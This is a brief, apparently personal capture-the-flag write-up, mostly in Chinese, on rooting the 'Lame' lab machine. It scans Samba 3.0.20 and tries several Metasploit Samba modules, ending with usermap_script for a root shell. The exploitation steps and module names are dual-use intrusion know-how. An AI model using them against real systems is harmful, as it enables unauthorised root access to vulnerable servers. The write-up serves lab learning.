lame(samba)

10.10.10.3

scan

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

linux os


这个training应该很简单,以前做过: 139端口——smbclient

kiotrix靶机(139端口samba)

Screenshot from 2019-01-03 15-51-52

得知服务版本 Samba 3.0.20-Debian

trying 1

Screenshot from 2019-01-03 16-00-54

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
locate exploits/linux/remote/9950.rb
[*] exec: locate exploits/linux/remote/9950.rb

/root/exploit-database/exploits/linux/remote/9950.rb
/usr/share/exploitdb/exploits/linux/remote/9950.rb

msfconsole
search -h
search platform:linux type:exploit samba
 exploit/linux/samba/chain_reply          2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/is_known_pipename    2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   exploit/linux/samba/lsa_transnames_heap  2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap   2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open           2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans              2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow

use exploit/linux/samba/setinfopolicy_heap
show options 
查看Exploit target:
2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10 
这个payload目标不对,于是
back

Screenshot from 2019-01-03 16-12-30

导入msf载荷

1
2
3
4
5
6
7
cd /root/.msf4/modules/exploits/
mkdir samba3.0.21-3.0.24 
cd samba*
cp /root/exploit-database/exploits/linux/remote/9950.rb .

重新启动msfconsole
search samba3

2 突然发现,目标版本好像不符合条件,samba3.0.21-3.0.24

ORZ,太粗心了

trying2:

Samba < 3.0.20 - Remote Heap Overflow exp是一些C代码,需要编译运行,而且注释是意大利语的。。

trying3:

google搜索Samba 3.0.20 https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

exploit/multi/samba/usermap_script

3

执行后,直接就是root权限